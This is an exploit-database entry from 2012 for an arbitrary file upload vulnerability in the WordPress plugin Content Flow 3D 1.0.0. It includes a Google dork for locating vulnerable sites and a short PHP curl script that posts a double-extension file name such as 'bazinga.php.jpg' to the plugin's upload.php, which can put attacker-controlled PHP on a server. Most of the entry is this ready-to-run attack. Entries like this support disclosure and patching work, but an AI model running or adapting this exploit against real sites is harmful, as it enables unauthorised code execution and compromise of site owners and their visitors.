WordPress Plugin Content Flow 3D 1.0.0 - Arbitrary File Upload

EDB-ID:

19036

CVE:

N/A


Author:

g11tch

Type:

webapps


Platform:

PHP

Date:

2012-06-10


# Exploit Title: Wordpress content-flow3d Arbitrary File Upload 
# Google Dork: inurl:plugins/content-flow3d/
# Date: 10June2012
# Exploit Author: g11tch
# Vendor Homepage: http://wordpress.org/extend/plugins/content-flow3d/
# Software Link: downloads.wordpress.org/plugin/content-flow3d.zip
# Version: 1.0.0
# Tested on: CentOS, Ubuntu Server 11.04

Greets in no particular order
pfizer.inc   for the constant motivation
pr1me, The_Eccentric, Spridel, Hackett, DrB0n3z, 
merci Sammy Forgit pour l'expression correcte
###############################################

#!/usr/bin/php -f
<?php
#
# upload.php curl exploit
#
//
// HTTP FILES,
//

$target = $argv[1];

$postData = array();
$postData[ 'qqfile' ] = "bazinga.php.jpg";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>